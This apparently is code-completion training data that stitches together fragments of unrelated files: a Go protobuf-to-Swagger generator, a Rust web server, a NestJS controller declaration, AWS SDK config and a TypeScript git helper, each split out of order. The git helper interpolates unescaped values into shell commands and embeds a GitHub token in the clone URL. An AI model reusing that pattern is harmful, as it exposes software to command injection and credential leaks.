renderEnumerationsAsDefinition(enums, s.Definitions, p.reg)
// File itself might have some comments and metadata.
packageProtoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "Package")
packageComments := protoComments(p.reg, p.File, nil, "Package", packageProtoPath)
if err := updateSwaggerDataFromComments(p.reg, &s, p, packageComments, true); err != nil {
panic(err)
}
// There may be additional options in the swagger option in the proto.
spb, err := extractSwaggerOptionFromFileDescriptor(p.FileDescriptorProto)
if err != nil {
panic(err)
}
if spb != nil {
if spb.Swagger != "" {
s.Swagger = spb.Swagger
}
if spb.Info != nil {
if spb.Info.Title != "" {
s.Info.Title = spb.Info.Title
}
if spb.Info.Description != "" {
s.Info.Description = spb.Info.Description
}
if spb.Info.TermsOfService != "" {
s.Info.TermsOfService = spb.Info.TermsOfService
}
if spb.Info.Version != "" {
s.Info.Version = spb.Info.Version
}
if spb.Info.Contact != nil {
if s.Info.Contact == nil {
s.Info.Contact = &swaggerContactObject{}
}
if spb.Info.Contact.Name != "" {
s.Info.Contact.Name = spb.Info.Contact.Name
}
if spb.Info.Contact.Url != "" {
s.Info.Contact.URL = spb.Info.Contact.Url
}
if spb.Info.Contact.Email != "" {
s.Info.Contact.Email = spb.Info.Contact.Email
}
}
if spb.Info.License != nil {
if s.Info.License == nil {
s.Info.License = &swaggerLicenseObject{}
}
if spb.Info.License.Name != "" {
s.Info.License.Name = spb.Info.License.Name
}
if spb.Info.License.Url != "" {
s.Info.License.URL = spb.Info.License.Url
}
}
if spb.Info.Extensions != nil {
exts, err := processExtensions(spb.Info.Extensions)
if err != nil {
return nil, err
}
s.Info.extensions = exts
}
}
if spb.Host != "" {
s.Host = spb.Host
}
if spb.BasePath != "" {
s.BasePath = spb.BasePath
}
if len(spb.Schemes) > 0 {
s.Schemes = make([]string, len(spb.Schemes))
for i, scheme := range spb.Schemes {
s.Schemes[i] = strings.ToLower(scheme.String())
}
}
if len(spb.Consumes) > 0 {
s.Consumes = make([]string, len(spb.Consumes))
copy(s.Consumes, spb.Consumes)
}
if len(spb.Produces) > 0 {
s.Produces = make([]string, len(spb.Produces))
copy(s.Produces, spb.Produces)
}
if spb.SecurityDefinitions != nil && spb.SecurityDefinitions.Security != nil {
if s.SecurityDefinitions == nil {
s.SecurityDefinitions = swaggerSecurityDefinitionsObject{}
}
for secDefKey, secDefValue := range spb.SecurityDefinitions.Security {
var newSecDefValue swaggerSecuritySchemeObject
if oldSecDefValue, ok := s.SecurityDefinitions[secDefKey]; !ok {
newSecDefValue = swaggerSecuritySchemeObject{}
} else {
newSecDefValue = oldSecDefValue
}
if secDefValue.Type != swagger_options.SecurityScheme_TYPE_INVALID {
switch secDefValue.Type {
case swagger_options.SecurityScheme_TYPE_BASIC:
newSecDefValue.Type = "basic"
case swagger_options.SecurityScheme_TYPE_API_KEY:
newSecDefValue.Type = "apiKey"
case swagger_options.SecurityScheme_TYPE_OAUTH2:
newSecDefValue.Type = "oauth2"
}
}
if secDefValue.Description != "" {
newSecDefValue.Description = secDefValue.Description
}
if secDefValue.Name != "" {
newSecDefValue.Name = secDefValue.Name
}
if secDefValue.In != swagger_options.SecurityScheme_IN_INVALID {
switch secDefValue.In {
case swagger_options.SecurityScheme_IN_QUERY:
newSecDefValue.In = "query"
case swagger_options.SecurityScheme_IN_HEADER:
newSecDefValue.In = "header"
}
}
if secDefValue.Flow != swagger_options.SecurityScheme_FLOW_INVALID {
switch secDefValue.Flow {
case swagger_options.SecurityScheme_FLOW_IMPLICIT:
newSecDefValue.Flow = "implicit"
case swagger_options.SecurityScheme_FLOW_PASSWORD:
newSecDefValue.Flow = "password"
case swagger_options.SecurityScheme_FLOW_APPLICATION:
newSecDefValue.Flow = "application"
case swagger_options.SecurityScheme_FLOW_ACCESS_CODE:
newSecDefValue.Flow = "accessCode"
}
}
if secDefValue.AuthorizationUrl != "" {
newSecDefValue.AuthorizationURL = secDefValue.AuthorizationUrl
}
if secDefValue.TokenUrl != "" {
newSecDefValue.TokenURL = secDefValue.TokenUrl
}
if secDefValue.Scopes != nil {
if newSecDefValue.Scopes == nil {
newSecDefValue.Scopes = swaggerScopesObject{}
}
for scopeKey, scopeDesc := range secDefValue.Scopes.Scope {
newSecDefValue.Scopes[scopeKey] = scopeDesc
}
}
if secDefValue.Extensions != nil {
exts, err := processExtensions(secDefValue.Extensions)
if err != nil {
return nil, err
}
newSecDefValue.extensions = exts
}
s.SecurityDefinitions[secDefKey] = newSecDefValue
}
}
if spb.Security != nil {
newSecurity := []swaggerSecurityRequirementObject{}
if s.Security == nil {
newSecurity = []swaggerSecurityRequirementObject{}
} else {
newSecurity = s.Security
}
for _, secReq := range spb.Security {
newSecReq := swaggerSecurityRequirementObject{}
for secReqKey, secReqValue := range secReq.SecurityRequirement {
newSecReqValue := make([]string, len(secReqValue.Scope))
copy(newSecReqValue, secReqValue.Scope)
newSecReq[secReqKey] = newSecReqValue
}
newSecurity = append(newSecurity, newSecReq)
}
s.Security = newSecurity
}
s.ExternalDocs = protoExternalDocumentationToSwaggerExternalDocumentation(spb.ExternalDocs, p.reg, spb)
// Populate all Paths with Responses set at top level,
// preferring Responses already set over those at the top level.
if spb.Responses != nil {
for _, verbs := range s.Paths {
var maps []swaggerResponsesObject
if verbs.Delete != nil {
maps = append(maps, verbs.Delete.Responses)
}
if verbs.Get != nil {
maps = append(maps, verbs.Get.Responses)
}
if verbs.Post != nil {
maps = append(maps, verbs.Post.Responses)
}
if verbs.Put != nil {
maps = append(maps, verbs.Put.Responses)
}
if verbs.Patch != nil {
maps = append(maps, verbs.Patch.Responses)
}
for k, v := range spb.Responses {
for _, respMap := range maps {
if _, ok := respMap[k]; ok {
// Don't overwrite already existing Responses
continue
}
respMap[k] = swaggerResponseObject{
Description: v.Description,
Schema: swaggerSchemaFromProtoSchema(v.Schema, p.reg, customRefs, nil),
Examples: swaggerExamplesFromProtoExamples(v.Examples),
}
}
}
}
}
if spb.Extensions != nil {
exts, err := processExtensions(spb.Extensions)
if err != nil {
return nil, err
}
s.extensions = exts
}
// Additional fields on the OpenAPI v2 spec's "Swagger" object
// should be added here, once supported in the proto.
}
// Finally add any references added by users that aren't
// otherwise rendered.
addCustomRefs(s.Definitions, p.reg, customRefs)
return &s, nil
}
func processExtensions(inputExts map[string]*structpb.Value) ([]extension, error) {
exts := []extension{}
for k, v := range inputExts {
if !strings.HasPrefix(k, "x-") {
return nil, fmt.Errorf("Extension keys need to start with \"x-\": %q", k)
}
ext, err := (&jsonpb.Marshaler{Indent: " "}).MarshalToString(v)
if err != nil {
return nil, err
}
exts = append(exts, extension{key: k, value: json.RawMessage(ext)})
}
sort.Slice(exts, func(i, j int) bool { return exts[i].key < exts[j].key })
return exts, nil
}
// updateSwaggerDataFromComments updates a Swagger object based on a comment
// from the proto file.
//
// First paragraph of a comment is used for summary. Remaining paragraphs of
// a comment are used for description. If 'Summary' field is not present on
// the passed swaggerObject, the summary and description are joined by \n\n.
//
// If there is a field named 'Info', its 'Summary' and 'Description' fields
// will be updated instead.
//
// If there is no 'Summary', the same behavior will be attempted on 'Title',
// but only if the last character is not a period.
func updateSwaggerDataFromComments(reg *descriptor.Registry, swaggerObject interface{}, data interface{}, comment string, isPackageObject bool) error {
if len(comment) == 0 {
return nil
}
// Checks whether the "use_go_templates" flag is set to true
if reg.GetUseGoTemplate() {
comment = goTemplateComments(comment, data, reg)
}
// Figure out what to apply changes to.
swaggerObjectValue := reflect.ValueOf(swaggerObject)
infoObjectValue := swaggerObjectValue.Elem().FieldByName("Info")
if !infoObjectValue.CanSet() {
// No such field? Apply summary and description directly to
// passed object.
infoObjectValue = swaggerObjectValue.Elem()
}
// Figure out which properties to update.
summaryValue := infoObjectValue.FieldByName("Summary")
descriptionValue := infoObjectValue.FieldByName("Description")
readOnlyValue := infoObjectValue.FieldByName("ReadOnly")
if readOnlyValue.Kind() == reflect.Bool && readOnlyValue.CanSet() && strings.Contains(comment, "Output only.") {
readOnlyValue.Set(reflect.ValueOf(true))
}
usingTitle := false
if !summaryValue.CanSet() {
summaryValue = infoObjectValue.FieldByName("Title")
usingTitle = true
}
paragraphs := strings.Split(comment, "\n\n")
// If there is a summary (or summary-equivalent) and it's empty, use the first
// paragraph as summary, and the rest as description.
if summaryValue.CanSet() {
summary := strings.TrimSpace(paragraphs[0])
description := strings.TrimSpace(strings.Join(paragraphs[1:], "\n\n"))
if !usingTitle || (len(summary) > 0 && summary[len(summary)-1] != '.') {
// overrides the schema value only if it's empty
// keep the comment precedence when updating the package definition
if summaryValue.Len() == 0 || isPackageObject {
summaryValue.Set(reflect.ValueOf(summary))
}
if len(description) > 0 {
if !descriptionValue.CanSet() {
return fmt.Errorf("Encountered object type with a summary, but no description")
}
// overrides the schema value only if it's empty
// keep the comment precedence when updating the package definition
if descriptionValue.Len() == 0 || isPackageObject {
descriptionValue.Set(reflect.ValueOf(description))
}
}
return nil
}
}
// There was no summary field on the swaggerObject. Try to apply the
// whole comment into description if the swagger object description is empty.
if descriptionValue.CanSet() {
if descriptionValue.Len() == 0 || isPackageObject {
descriptionValue.Set(reflect.ValueOf(strings.Join(paragraphs, "\n\n")))
}
return nil
}
return fmt.Errorf("no description nor summary property")
}
func fieldProtoComments(reg *descriptor.Registry, msg *descriptor.Message, field *descriptor.Field) string {
protoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil)), "Field")
for i, f := range msg.Fields {
if f == field {
return protoComments(reg, msg.File, msg.Outers, "MessageType", int32(msg.Index), protoPath, int32(i))
}
}
return ""
}
func enumValueProtoComments(reg *descriptor.Registry, enum *descriptor.Enum) string {
protoPath := protoPathIndex(reflect.TypeOf((*pbdescriptor.EnumDescriptorProto)(nil)), "Value")
var comments []string
for idx, value := range enum.GetValue() {
name := value.GetName()
if reg.GetEnumsAsInts() {
name = strconv.Itoa(int(value.GetNumber()))
}
str := protoComments(reg, enum.File, enum.Outers, "EnumType", int32(enum.Index), protoPath, int32(idx))
if str != "" {
comments = append(comments, name+": "+str)
}
}
if len(comments) > 0 {
return "- " + strings.Join(comments, "\n - ")
}
return ""
}
func protoComments(reg *descriptor.Registry, file *descriptor.File, outers []string, typeName string, typeIndex int32, fieldPaths ...int32) string {
if file.SourceCodeInfo == nil {
fmt.Fprintln(os.Stderr, "descriptor.File should not contain nil SourceCodeInfo")
return ""
}
outerPaths := make([]int32, len(outers))
for i := range outers {
location := ""
if file.Package != nil {
location = file.GetPackage()
}
msg, err := reg.LookupMsg(location, strings.Join(outers[:i+1], "."))
if err != nil {
panic(err)
}
outerPaths[i] = int32(msg.Index)
}
for _, loc := range file.SourceCodeInfo.Location {
if !isProtoPathMatches(loc.Path, outerPaths, typeName, typeIndex, fieldPaths) {
continue
}
comments := ""
if loc.LeadingComments != nil {
comments = strings.TrimRight(*loc.LeadingComments, "\n")
comments = strings.TrimSpace(comments)
// TODO(ivucica): this is a hack to fix "// " being interpreted as "//".
// perhaps we should:
// - split by \n
// - determine if every (but first and last) line begins with " "
// - trim every line only if that is the case
// - join by \n
comments = strings.Replace(comments, "\n ", "\n", -1)
}
return comments
}
return ""
}
func goTemplateComments(comment string, data interface{}, reg *descriptor.Registry) string {
var temp bytes.Buffer
tpl, err := template.New("").Funcs(template.FuncMap{
// Allows importing documentation from a file
"import": func(name string) string {
file, err := ioutil.ReadFile(name)
if err != nil {
return err.Error()
}
// Runs template over imported file
return goTemplateComments(string(file), data, reg)
},
// Grabs title and description from a field
"fieldcomments": func(msg *descriptor.Message, field *descriptor.Field) string {
return strings.Replace(fieldProtoComments(reg, msg, field), "\n", "<br>", -1)
},
}).Parse(comment)
if err != nil {
// If there is an error parsing the templating insert the error as string in the comment
// to make it easier to debug the template error
return err.Error()
}
err = tpl.Execute(&temp, data)
if err != nil {
// If there is an error executing the templating insert the error as string in the comment
// to make it easier to debug the error
return err.Error()
}
return temp.String()
}
var messageProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "MessageType")
var nestedProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil)), "NestedType")
var packageProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "Package")
var serviceProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil)), "Service")
var methodProtoPath = protoPathIndex(reflect.TypeOf((*pbdescriptor.ServiceDescriptorProto)(nil)), "Method")
func isProtoPathMatches(paths []int32, outerPaths []int32, typeName string, typeIndex int32, fieldPaths []int32) bool {
if typeName == "Package" && typeIndex == packageProtoPath {
// path for package comments is just [2], and all the other processing
// is too complex for it.
if len(paths) == 0 || typeIndex != paths[0] {
return false
}
return true
}
if len(paths) != len(outerPaths)*2+2+len(fieldPaths) {
return false
}
if typeName == "Method" {
if paths[0] != serviceProtoPath || paths[2] != methodProtoPath {
return false
}
paths = paths[2:]
} else {
typeNameDescriptor := reflect.TypeOf((*pbdescriptor.FileDescriptorProto)(nil))
if len(outerPaths) > 0 {
if paths[0] != messageProtoPath || paths[1] != outerPaths[0] {
return false
}
paths = paths[2:]
outerPaths = outerPaths[1:]
for i, v := range outerPaths {
if paths[i*2] != nestedProtoPath || paths[i*2+1] != v {
return false
}
}
paths = paths[len(outerPaths)*2:]
if typeName == "MessageType" {
typeName = "NestedType"
}
typeNameDescriptor = reflect.TypeOf((*pbdescriptor.DescriptorProto)(nil))
}
if paths[0] != protoPathIndex(typeNameDescriptor, typeName) || paths[1] != typeIndex {
return false
}
paths = paths[2:]
}
for i, v := range fieldPaths {
if paths[i] != v {
return false
}
}
return true
}
// protoPathIndex returns a path component for google.protobuf.descriptor.SourceCode_Location.
//
// Specifically, it returns an id as generated from descriptor proto which
// can be used to determine what type the id following it in the path is.
// For example, if we are trying to locate comments related to a field named
// `Address` in a message named `Person`, the path will be:
//
// [4, a, 2, b]
//
// While `a` gets determined by the order in which the messages appear in
// the proto file, and `b` is the field index specified in the proto
// file itself, the path actually needs to specify that `a` refers to a
// message and not, say, a service; and that `b` refers to a field and not
// an option.
//
// protoPathIndex figures out the values 4 and 2 in the above example. Because
// messages are top level objects, the value of 4 comes from field id for
// `MessageType` inside `google.protobuf.descriptor.FileDescriptor` message.
// This field has a message type `google.protobuf.descriptor.DescriptorProto`.
// And inside message `DescriptorProto`, there is a field named `Field` with id
// 2.
//
// Some code generators seem to be hardcoding these values; this method instead
// interprets them from `descriptor.proto`-derived Go source as necessary.
func protoPathIndex(descriptorType reflect.Type, what string) int32 {
field, ok := descriptorType.Elem().FieldByName(what)
if !ok {
panic(fmt.Errorf("could not find protobuf descriptor type id for %s", what))
}
pbtag := field.Tag.Get("protobuf")
if pbtag == "" {
panic(fmt.Errorf("no Go tag 'protobuf' on protobuf descriptor for %s", what))
}
path, err := strconv.Atoi(strings.Split(pbtag, ",")[1])
if err != nil {
panic(fmt.Errorf("protobuf descriptor id for %s cannot be converted to a number: %s", what, err.Error()))
}
return int32(path)
}
// extractOperationOptionFromMethodDescriptor extracts the message of type
// swagger_options.Operation from a given proto method's descriptor.
func extractOperationOptionFromMethodDescriptor(meth *pbdescriptor.MethodDescriptorProto) (*swagger_options.Operation, error) {
if meth.Options == nil {
return nil, nil
}
if !proto.HasExtension(meth.Options, swagger_options.E_Openapiv2Operation) {
return nil, nil
}
ext, err := proto.GetExtension(meth.Options, swagger_options.E_Openapiv2Operation)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.Operation)
if !ok {
return nil, fmt.Errorf("extension is %T; want an Operation", ext)
}
return opts, nil
}
// extractSchemaOptionFromMessageDescriptor extracts the message of type
// swagger_options.Schema from a given proto message's descriptor.
func extractSchemaOptionFromMessageDescriptor(msg *pbdescriptor.DescriptorProto) (*swagger_options.Schema, error) {
if msg.Options == nil {
return nil, nil
}
if !proto.HasExtension(msg.Options, swagger_options.E_Openapiv2Schema) {
return nil, nil
}
ext, err := proto.GetExtension(msg.Options, swagger_options.E_Openapiv2Schema)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.Schema)
if !ok {
return nil, fmt.Errorf("extension is %T; want a Schema", ext)
}
return opts, nil
}
// extractSwaggerOptionFromFileDescriptor extracts the message of type
// swagger_options.Swagger from a given proto method's descriptor.
func extractSwaggerOptionFromFileDescriptor(file *pbdescriptor.FileDescriptorProto) (*swagger_options.Swagger, error) {
if file.Options == nil {
return nil, nil
}
if !proto.HasExtension(file.Options, swagger_options.E_Openapiv2Swagger) {
return nil, nil
}
ext, err := proto.GetExtension(file.Options, swagger_options.E_Openapiv2Swagger)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.Swagger)
if !ok {
return nil, fmt.Errorf("extension is %T; want a Swagger object", ext)
}
return opts, nil
}
func extractJSONSchemaFromFieldDescriptor(fd *pbdescriptor.FieldDescriptorProto) (*swagger_options.JSONSchema, error) {
if fd.Options == nil {
return nil, nil
}
if !proto.HasExtension(fd.Options, swagger_options.E_Openapiv2Field) {
return nil, nil
}
ext, err := proto.GetExtension(fd.Options, swagger_options.E_Openapiv2Field)
if err != nil {
return nil, err
}
opts, ok := ext.(*swagger_options.JSONSchema)
if !ok {
return nil, fmt.Errorf("extension is %T; want a JSONSchema object", ext)
}
return opts, nil
}
func protoJSONSchemaToSwaggerSchemaCore(j *swagger_options.JSONSchema, reg *descriptor.Registry, refs refMap) schemaCore {
ret := schemaCore{}
if j.GetRef() != "" {
swaggerName, ok := fullyQualifiedNameToSwaggerName(j.GetRef(), reg)
if ok {
ret.Ref = "#/definitions/" + swaggerName
if refs != nil {
refs[j.GetRef()] = struct{}{}
}
} else {
ret.Ref += j.GetRef()
}
} else {
f, t := protoJSONSchemaTypeToFormat(j.GetType())
ret.Format = f
ret.Type = t
}
return ret
}
func updateSwaggerObjectFromJSONSchema(s *swaggerSchemaObject, j *swagger_options.JSONSchema, reg *descriptor.Registry, data interface{}) {
s.Title = j.GetTitle()
s.Description = j.GetDescription()
if reg.GetUseGoTemplate() {
s.Title = goTemplateComments(s.Title, data, reg)
s.Description = goTemplateComments(s.Description, data, reg)
}
s.ReadOnly = j.GetReadOnly()
s.MultipleOf = j.GetMultipleOf()
s.Maximum = j.GetMaximum()
s.ExclusiveMaximum = j.GetExclusiveMaximum()
s.Minimum = j.GetMinimum()
s.ExclusiveMinimum = j.GetExclusiveMinimum()
s.MaxLength = j.GetMaxLength()
s.MinLength = j.GetMinLength()
s.Pattern = j.GetPattern()
s.Default = j.GetDefault()
s.MaxItems = j.GetMaxItems()
s.MinItems = j.GetMinItems()
s.UniqueItems = j.GetUniqueItems()
s.MaxProperties = j.GetMaxProperties()
s.MinProperties = j.GetMinProperties()
s.Required = j.GetRequired()
if overrideType := j.GetType(); len(overrideType) > 0 {
s.Type = strings.ToLower(overrideType[0].String())
}
}
func swaggerSchemaFromProtoSchema(s *swagger_options.Schema, reg *descriptor.Registry, refs refMap, data interface{}) swaggerSchemaObject {
ret := swaggerSchemaObject{
ExternalDocs: protoExternalDocumentationToSwaggerExternalDocumentation(s.GetExternalDocs(), reg, data),
}
ret.schemaCore = protoJSONSchemaToSwaggerSchemaCore(s.GetJsonSchema(), reg, refs)
updateSwaggerObjectFromJSONSchema(&ret, s.GetJsonSchema(), reg, data)
if s != nil && s.Example != nil {
ret.Example = json.RawMessage(s.Example.Value)
}
return ret
}
func swaggerExamplesFromProtoExamples(in map[string]string) map[string]interface{} {
if len(in) == 0 {
return nil
}
out := make(map[string]interface{})
for mimeType, exampleStr := range in {
switch mimeType {
case "application/json":
// JSON example objects are rendered raw.
out[mimeType] = json.RawMessage(exampleStr)
default:
// All other mimetype examples are rendered as strings.
out[mimeType] = exampleStr
}
}
return out
}
func protoJSONSchemaTypeToFormat(in []swagger_options.JSONSchema_JSONSchemaSimpleTypes) (string, string) {
if len(in) == 0 {
return "", ""
}
// Can't support more than 1 type, just return the first element.
// This is due to an inconsistency in the design of the openapiv2 proto
// and that used in schemaCore. schemaCore uses the v3 definition of types,
// which only allows a single string, while the openapiv2 proto uses the OpenAPI v2
// definition, which defers to the JSON schema definition, which allows a string or an array.
// Sources:
// https://swagger.io/specification/#itemsObject
// https://tools.ietf.org/html/draft-fge-json-schema-validation-00#section-5.5.2
switch in[0] {
case swagger_options.JSONSchema_UNKNOWN, swagger_options.JSONSchema_NULL:
return "", ""
case swagger_options.JSONSchema_OBJECT:
return "object", ""
case swagger_options.JSONSchema_ARRAY:
return "array", ""
case swagger_options.JSONSchema_BOOLEAN:
return "boolean", "boolean"
case swagger_options.JSONSchema_INTEGER:
return "integer", "int32"
case swagger_options.JSONSchema_NUMBER:
return "number", "double"
case swagger_options.JSONSchema_STRING:
// NOTE: in swagger specifition, format should be empty on string type
return "string", ""
default:
// Maybe panic?
return "", ""
}
}
func protoExternalDocumentationToSwaggerExternalDocumentation(in *swagger_options.ExternalDocumentation, reg *descriptor.Registry, data interface{}) *swaggerExternalDocumentationObject {
if in == nil {
return nil
}
if reg.GetUseGoTemplate() {
in.Description = goTemplateComments(in.Description, data, reg)
}
return &swaggerExternalDocumentationObject{
Description: in.Description,
URL: in.Url,
}
}
func addCustomRefs(d swaggerDefinitionsObject, reg *descriptor.Registry, refs refMap) {
if len(refs) == 0 {
return
}
msgMap := make(messageMap)
enumMap := make(enumMap)
for ref := range refs {
swgName, swgOk := fullyQualifiedNameToSwaggerName(ref, reg)
if !swgOk {
glog.Errorf("can't resolve swagger name from CustomRef '%v'", ref)
continue
}
if _, ok := d[swgName]; ok {
// Skip already existing definitions
delete(refs, ref)
continue
}
msg, err := reg.LookupMsg("", ref)
if err == nil {
msgMap[swgName] = msg
continue
}
enum, err := reg.LookupEnum("", ref)
if err == nil {
enumMap[swgName] = enum
continue
}
// ?? Should be either enum or msg
}
renderMessagesAsDefinition(msgMap, d, reg, refs)
renderEnumerationsAsDefinition(enumMap, d, reg)
// Run again in case any new refs were added
addCustomRefs(d, reg, refs)
}
func lowerCamelCase(fieldName string, fields []*descriptor.Field, msgs []*descriptor.Message) string {
for _, oneField := range fields {
if oneField.GetName() == fieldName {
return oneField.GetJsonName()
}
}
messageNameToFieldsToJSONName := make(map[string]map[string]string, 0)
fieldNameToType := make(map[string]string, 0)
for _, msg := range msgs {
fieldNameToJSONName := make(map[string]string, 0)
for _, oneField := range msg.GetField() {
fieldNameToJSONName[oneField.GetName()] = oneField.GetJsonName()
fieldNameToType[oneField.GetName()] = oneField.GetTypeName()
}
messageNameToFieldsToJSONName[msg.GetName()] = fieldNameToJSONName
}
if strings.Contains(fieldName, ".") {
fieldNames := strings.Split(fieldName, ".")
fieldNamesWithCamelCase := make([]string, 0)
for i := 0; i < len(fieldNames)-1; i++ {
fieldNamesWithCamelCase = append(fieldNamesWithCamelCase, doCamelCase(string(fieldNames[i])))
}
prefix := strings.Join(fieldNamesWithCamelCase, ".")
reservedJSONName := getReservedJSONName(fieldName, messageNameToFieldsToJSONName, fieldNameToType)
if reservedJSONName != "" {
return prefix + "." + reservedJSONName
}
}
return doCamelCase(fieldName)
}
func doCamelCase(input string) string {
parameterString := casing.Camel(input)
builder := &strings.Builder{}
builder.WriteString(strings.ToLower(string(parameterString[0])))
builder.WriteString(parameterString[1:])
return builder.String()
}
func getReservedJSONName(fieldName string, messageNameToFieldsToJSONName map[string]map[string]string, fieldNameToType map[string]string) string {
if len(strings.Split(fieldName, ".")) == 2 {
fieldNames := strings.Split(fieldName, ".")
firstVariable := fieldNames[0]
firstType := fieldNameToType[firstVariable]
firstTypeShortNames := strings.Split(firstType, ".")
firstTypeShortName := firstTypeShortNames[len(firstTypeShortNames)-1]
return messageNameToFieldsToJSONName[firstTypeShortName][fieldNames[1]]
}
fieldNames := strings.Split(fieldName, ".")
return getReservedJSONName(strings.Join(fieldNames[1:], "."), messageNameToFieldsToJSONName, fieldNameToType)
} | }
|
main.rs | #![allow(unused_must_use)]
#[macro_use]
extern crate rbatis;
use once_cell::sync::Lazy;
use salvo::prelude::*;
use rbatis::crud::CRUD;
use rbatis::rbatis::Rbatis;
#[crud_table]
#[derive(Clone, Debug)]
pub struct BizActivity {
pub id: Option<String>,
pub name: Option<String>,
pub pc_link: Option<String>,
pub h5_link: Option<String>,
pub pc_banner_img: Option<String>,
pub h5_banner_img: Option<String>,
pub sort: Option<String>,
pub status: Option<i32>,
pub remark: Option<String>,
pub create_time: Option<rbatis::DateTimeNative>,
pub version: Option<i32>,
pub delete_flag: Option<i32>,
}
pub static RB: Lazy<Rbatis> = Lazy::new(|| Rbatis::new());
#[fn_handler]
async fn hello(res: &mut Response) |
#[tokio::main]
pub async fn main() -> Result<(), Box<dyn std::error::Error + Send + Sync>> {
fast_log::init(fast_log::config::Config::new().console());
log::info!("linking database...");
let rb=example::init_sqlite_path("").await;
drop(rb);
RB.link("sqlite://target/sqlite.db").await.expect("rbatis link database fail");
log::info!("linking database successful!");
let addr = "127.0.0.1:8000";
let server = Server::new(TcpListener::bind(addr)).serve(Router::new().handle(hello));
println!("Listening on http://{}", addr);
server.await;
Ok(())
}
| {
let v = RB.fetch_list::<BizActivity>().await.unwrap_or_default();
res.render_json(&v)
} |
document.controller.d.ts | /// <reference types="multer" />
import { DocumentService } from './document.service';
import { CreateDocumentDto } from './dto/create-document.dto';
import { HelperService } from '../common/helper';
import { JwtService } from '@nestjs/jwt';
export declare class | {
private readonly documentService;
private jwtService;
private helperService;
constructor(documentService: DocumentService, jwtService: JwtService, helperService: HelperService);
create(createDocumentDto: CreateDocumentDto): string;
accountStatus(body: any): Promise<{
status: boolean;
data: {};
} | {
status: boolean;
data: {
user_status: string;
driver_status: string;
};
}>;
updateStatus(body: any): Promise<{
status: boolean;
message: string;
}>;
uploadFile(body: any, files: Array<Express.Multer.File>): Promise<{
status: boolean;
message: any;
}>;
}
| DocumentController |
config.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT. | pub(crate) endpoint_resolver: ::std::sync::Arc<dyn aws_endpoint::ResolveAwsEndpoint>,
pub(crate) region: Option<aws_types::region::Region>,
pub(crate) credentials_provider:
std::sync::Arc<dyn aws_auth::provider::AsyncProvideCredentials>,
}
impl std::fmt::Debug for Config {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut config = f.debug_struct("Config");
config.finish()
}
}
impl Config {
pub fn builder() -> Builder {
Builder::default()
}
/// The signature version 4 service signing name to use in the credential scope when signing requests.
///
/// The signing service may be overidden by the `Endpoint`, or by specifying a custom [`SigningService`](aws_types::SigningService) during
/// operation construction
pub fn signing_service(&self) -> &'static str {
"machinelearning"
}
}
#[derive(Default)]
pub struct Builder {
endpoint_resolver: Option<::std::sync::Arc<dyn aws_endpoint::ResolveAwsEndpoint>>,
region: Option<aws_types::region::Region>,
credentials_provider: Option<std::sync::Arc<dyn aws_auth::provider::AsyncProvideCredentials>>,
}
impl Builder {
pub fn new() -> Self {
Self::default()
}
pub fn endpoint_resolver(
mut self,
endpoint_resolver: impl aws_endpoint::ResolveAwsEndpoint + 'static,
) -> Self {
self.endpoint_resolver = Some(::std::sync::Arc::new(endpoint_resolver));
self
}
pub fn region(mut self, region_provider: impl aws_types::region::ProvideRegion) -> Self {
self.region = region_provider.region();
self
}
/// Set the credentials provider for this service
pub fn credentials_provider(
mut self,
credentials_provider: impl aws_auth::provider::AsyncProvideCredentials + 'static,
) -> Self {
self.credentials_provider = Some(std::sync::Arc::new(credentials_provider));
self
}
pub fn build(self) -> Config {
Config {
endpoint_resolver: self
.endpoint_resolver
.unwrap_or_else(|| ::std::sync::Arc::new(crate::aws_endpoint::endpoint_resolver())),
region: {
use aws_types::region::ProvideRegion;
self.region
.or_else(|| aws_types::region::default_provider().region())
},
credentials_provider: self
.credentials_provider
.unwrap_or_else(|| std::sync::Arc::new(aws_auth::provider::default_provider())),
}
}
} | pub struct Config { |
git.ts | import * as shell from './shell';
/**
* Clones a repository from GitHub. Requires a `GITHUB_TOKEN` env variable.
*
* @param repositoryUrl the repository to clone.
* @param targetDir the clone directory.
*/
export function clone(repositoryUrl: string, targetDir: string) {
const gitHubToken = process.env.GITHUB_TOKEN;
if (!gitHubToken) {
throw new Error('GITHUB_TOKEN env variable is required');
}
shell.run(`git clone https://${gitHubToken}@${repositoryUrl}.git ${targetDir}`);
}
/**
* Query the git index for changes.
*
* @return True if changes exist, False otherwise.
*/
export function diffIndex(): boolean {
try {
shell.run('git diff-index --exit-code HEAD --');
return false;
} catch (err) {
return true;
}
}
/**
* Add files to the index.
*
* @param p the path.
*/
export function add(p: string) {
shell.run(`git add ${p}`);
}
/**
* Commit.
*
* @param message the commit message.
*/
export function commit(message: string) {
shell.run(`git commit -m "${message}"`);
}
/**
* Initialize a repository.
*/
export function init() {
shell.run('git init');
}
/**
* Cerate a tag.
*
* @param name tag name.
* @returns true if the tag was created, false if it already exists.
*/
export function tag(name: string): boolean {
try {
shell.run(`git tag -a ${name} -m ${name}`, { capture: true });
return true;
} catch (e) {
if (e.message.includes('already exists')) {
return false;
}
throw e;
}
}
/**
* Push a ref to origin.
*
* @param ref the ref
*/
export function push(ref: string) {
shell.run(`git push origin ${ref}`);
}
/**
* Checkout to a new branch. Creates a new one if `options.createIfMissing` is True and the branch doesn't exist.
*
* @param branch the branch.
* @param options options.
*/
export function checkout(branch: string, options: { createIfMissing?: boolean } ) {
if (options.createIfMissing) {
try {
shell.run(`git show-branch origin/${branch}`);
} catch (e) {
if (e instanceof Error && e.message.includes('fatal: bad sha1 reference')) {
console.log('Remote branch not found, creating new branch.');
shell.run(`git checkout -B ${branch}`);
return;
}
}
}
shell.run(`git checkout ${branch}`);
}
/**
* Fetch the configured git user name for the current directory.
* Returns undefined if not configured.
*/
export function username() {
try {
